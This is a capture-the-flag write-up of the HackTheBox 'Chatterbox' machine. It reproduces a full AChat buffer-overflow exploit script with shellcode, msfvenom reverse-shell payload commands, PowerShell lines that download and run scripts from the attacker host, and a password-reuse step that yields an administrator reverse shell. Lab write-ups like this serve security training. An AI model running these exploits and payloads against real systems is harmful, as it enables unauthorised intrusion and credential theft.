HTB：Chatterbox[WriteUP]

Connect to the HackTheBox server and spawn target machine

Infomation Collection

Use Rustscan to perform oepn scanning on the TCP port of the target

Use Nmap to perform script and service scanning on the TCP port of the target

Use Curl accessing ports 9255, 9256 of the target

Exploiting Vulnerabilities

Use Searchsploit to search for Achat vulnerabilities

Running Metasploit

Copy the original exploitation script to current directory from searchsploit

Audit this code

USER_FLAG：cb2084eeb0607f726c68709d13bd7f4d

Privilege Escalation

Running Metasploit again

I try to get a powershell shell

Use the function of the PowerUp script

Attempt to password reuse testing on administrator user through runascs tool

ROOT_FLAG: 9c5919d1087f8c619f655b4d89148d40

Connect to the HackTheBox server and spawn target machine

Target_IP: 10.10.10.74

Attacker_IP: 10.10.16.8

Infomation Collection

Use Rustscan to perform oepn scanning on the TCP port of the target

rustscan -a 10.10.10.74 -r 1-65535 --ulimit 5000 | tee res.txt

Extract the ports from the results using GREP、AWK、PASTE command and assign them to the $ports variable

ports=$(grep syn-ack res.txt | awk -F/ '{print $1}' | paste -sd ',')

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep syn-ack res.txt | awk -F/ '{print $1}' | paste -sd ','
135,139,445,9255,9256,49152,49153,49154,49155,49156,49157

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep syn-ack res.txt | awk -F/ '{print $1}' | paste -sd ',')

Use Nmap to perform script and service scanning on the TCP port of the target

nmap -p$ports -sCV 10.10.10.74

Use Nmap to perform scanning on the common UDP port of the target

nmap -sU --top-ports 20 -Pn 10.10.10.74

Use Nmap to perform vulnerability scanning on the TCP port of the target

nmap -p$ports --script=vuln 10.10.10.74

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p$ports --script=vuln 10.10.10.74
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-25 20:35 EST
Nmap scan report for 10.10.10.74
Host is up (0.12s latency).

PORT      STATE SERVICE
135/tcp   open msrpc
139/tcp   open netbios-ssn
445/tcp   open microsoft-ds
9255/tcp open mon
9256/tcp open unknown
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 117.50 seconds

Use Curl accessing ports 9255, 9256 of the target

curl -v http://10.10.10.74:9255

curl -v http://10.10.10.74:9256 --http0.9

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -v http://10.10.10.74:9255
* Trying 10.10.10.74:9255...
* Connected to 10.10.10.74 (10.10.10.74) port 9255
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.10.10.74:9255
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 204 No Content
< Connection: close
< Server: AChat
<
* shutting down connection #0

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -v http://10.10.10.74:9256 --http0.9
* Trying 10.10.10.74:9256...
* Connected to 10.10.10.74 (10.10.10.74) port 9256
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.10.10.74:9256
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
ERROR
* shutting down connection #0

Exploiting Vulnerabilities

Use Searchsploit to search for Achat vulnerabilities

searchsploit achat

Because here that there are already exploitation modules related to Buffer Overflow vulnerabilities for this server in Metasploit, Consequently I have decided to utilize it through Metasploit

Running Metasploit

msfconsole

Search for modules related to Achat

search achat

Switch this module for use Achat vulnerability

use exploit/windows/misc/achat_bof

Configure the LHOST, LPORT, RHOSTS, RPORT, PAYLOAD parameter properly, Eventually exploit or run to utilize this module

Obviously, It is failed so I tried to manual exploit this vulnerability

Copy the original exploitation script to current directory from searchsploit

searchsploit -m 36025.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 36025.py
Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
    Codes: CVE-2015-1578, CVE-2015-1577, OSVDB-118206, OSVDB-118104
Verified: False
File Type: Python script, ASCII text executable, with very long lines (637)
Copied to: /home/kali/Desktop/temp/36025.py

We can see some useful information for the exploitation script, such as vulnerability number: CVE-2015-1578, CVE-2015-1577

Audit this code

#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bitimport socket
import sys, time# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytesbuf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"print "---->{P00F}!"
i=0
while i<len(p):if i > 172000:time.sleep(1.0)sent = sock.sendto(p[i:(i+8192)], server_address)i += sent
sock.close()

Apparently, We need to generate a trojan and put its hexadecimal data into the exploitation script

I modified the command to generate the trojan so that I can get a reverse shell rather than a calculator :)

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.16.8 LPORT=1425 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python | tee buf.txt

Copy all strings starting with buf, paste and replace them in the exploitation script

Extract a partion about the buf string into a new file

grep buf buf.txt > buf_new.txt

Delete the original buf string section in the script just like this

Insert the buf string into the Line 12 of the exploitation script

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ex -s 36025.py << EOF
heredoc> 12read buf_new.txt
heredoc> wq
heredoc> EOF

When the buf string insert successfully, We still need to modify the victim IP address

Start listening locally using nc

rlwrap -cAr nc -lvnp 1425

Running the exploitation script through python2

python2 36025.py

Successfully obtained the target reverse shell

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.74] 49167
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

Find the location of user_flag and view its contents

C:\Windows\system32>cd c:\
cd c:\

c:\>dir /s user.txt
dir /s user.txt
Volume in drive C has no label.
Volume Serial Number is 502F-F304

Directory of c:\Users\Alfred\Desktop

11/26/2024 05:58 AM                34 user.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   3,348,357,120 bytes free

c:\>type "c:\Users\Alfred\Desktop\user.txt"
type "c:\Users\Alfred\Desktop\user.txt"
cb2084eeb0607f726c68709d13bd7f4d

USER_FLAG：cb2084eeb0607f726c68709d13bd7f4d

Privilege Escalation

I try to automatically get administrator shell by metasploit. Generate a MSF trojan firstly

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.16.8 LPORT=4444 -f exe > shell.exe

Secondly, I create a temp share so that victim machine can download my trojan

impacket-smbserver temp . -smb2support -username temp -password temp

The victim machine enter a low privilege directory, for example C:\Users\Alfred\Desktop

cd C:\Users\Alfred\Desktop

Download trojan from attacker machine using copy command

copy \\10.10.16.8\temp\shell.exe shell.exe

C:\Users\Alfred\Desktop>copy \\10.10.16.8\temp\shell.exe shell.exe
copy \\10.10.16.8\temp\shell.exe shell.exe
        1 file(s) copied.

C:\Users\Alfred\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304

Directory of C:\Users\Alfred\Desktop

11/26/2024 07:44 AM    <DIR>          .
11/26/2024 07:44 AM    <DIR>          ..
11/26/2024 02:51 AM            73,802 shell.exe
11/26/2024 07:34 AM                34 user.txt
               2 File(s)         73,836 bytes
               2 Dir(s)   3,667,869,696 bytes free

After downloading complete, Cut off the connection with the attacker machine's SMB server

net use \\10.10.16.8\temp /delete

Running Metasploit again

msfconsole

Switch the general listenning module

use exploit/multi/handler

Configure the LHOST, LPORT, PAYLOAD parameter properly and input exploit or run to utilize this module

C:\Users\Alfred\Desktop>cmd.exe /c .\shell.exe
cmd.exe /c .\shell.exe

C:\Users\Alfred\Desktop>cmd.exe /c .\shell.exe
cmd.exe /c .\shell.exe

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.8:4444

I‘m sure nothing happened here, But I don't konw the matter where is it :(

I try to get a powershell shell

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.16.9/shell.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Open the port of attacker machine for listening to provide Invoke-PowerShellTcp.ps1

php -S 0:80

Insert the hexdecimal data into exploitation script and running the script

python2 36025.py

And then, Http server has respone and local nc also has echo display

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# php -S 0:80
[Tue Nov 26 21:42:36 2024] PHP 8.2.24 Development Server (http://0:80) started
[Tue Nov 26 21:44:17 2024] 10.10.10.74:49162 Accepted
[Tue Nov 26 21:44:17 2024] 10.10.10.74:49162 [200]: GET /shell.ps1
[Tue Nov 26 21:44:17 2024] 10.10.10.74:49162 Closing

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.74] 49165
Windows PowerShell running as user Alfred on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
chatterbox\alfred

Control victim machine load the PowerUp automatical script from attacker machine

iex(new-object net.webclient).downloadstring('http://10.10.16.9/PowerUp.ps1')

Use the function of the PowerUp script

Invoke-AllChecks

PS C:\Users\Alfred\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.16.9/PowerUp.ps1')

PS C:\Users\Alfred\Desktop> Invoke-AllChecks

DefaultDomainName    :
DefaultUserName      : Alfred
DefaultPassword      : Welcome1!
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :
Check                : Registry Autologons

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

We got the Alfred user's credentials

UserName: Alfred

UserPassword: Welcome1!

I try to start Win-RM server but it's failed

enable-psremoting -force

set-wsmanquickconfig -force

PS C:\Users\Alfred\Desktop> enable-psremoting -force
PS C:\Users\Alfred\Desktop> Invoke-PowerShellTcp : Access is denied. You need to run this cmdlet from an el
evated process.
At line:127 char:21
+ Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.16.9 -Port 1425
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorExcep
   tion
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
   n,Invoke-PowerShellTcp

PS C:\Users\Alfred\Desktop> set-wsmanquickconfig -force
PS C:\Users\Alfred\Desktop> Invoke-PowerShellTcp : Access is denied. You need to run this cmdlet from an el
evated process.
At line:127 char:21
+ Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.16.9 -Port 1425
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorExcep
   tion
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio
   n,Invoke-PowerShellTcp

I copy runascs tool to victim machine from attacker machine

PS C:\Users\Alfred\Desktop> PS C:\Users\Alfred\Desktop> net use \\10.10.16.9\temp /user:temp temp
The command completed successfully.

PS C:\Users\Alfred\Desktop> copy \\10.10.16.9\temp\runascs.exe ./runascs.exe
PS C:\Users\Alfred\Desktop> dir

    Directory: C:\Users\Alfred\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---        11/26/2024 10:36 PM      51712 runascs.exe
-ar--        11/26/2024   3:21 PM         34 user.txt

View users in the victim system

net user

PS C:\Users\Alfred\Desktop> net user

User accounts for \\CHATTERBOX

-------------------------------------------------------------------------------
Administrator Alfred Guest
The command completed successfully.

PS C:\Users\Alfred\Desktop> wget http://10.10.16.9/runascs.exe -O runascs.exe

User accounts for \\CHATTERBOX

-------------------------------------------------------------------------------
Administrator Alfred Guest
The command completed successfully.

Local side nc starts listening on 1426 port

rlwrap -cAr nc -lvnp 1426

Attempt to password reuse testing on administrator user through runascs tool

.\runascs.exe administrator 'Welcome1!' powershell -r 10.10.16.9:1426 -t 0

We successfully got the Administrator user shell !

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1426
listening on [any] 1426 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.74] 49181
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\administrator

Finally, Finding the root_flag location and view its content

C:\Windows\system32>cd c:\
cd c:\

c:\>dir /s root.txt
dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is 502F-F304

Directory of c:\Users\Administrator\Desktop

11/26/2024 03:21 PM                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   3,346,296,832 bytes free

c:\>type "c:\Users\Administrator\Desktop\root.txt"
type "c:\Users\Administrator\Desktop\root.txt"
9c5919d1087f8c619f655b4d89148d40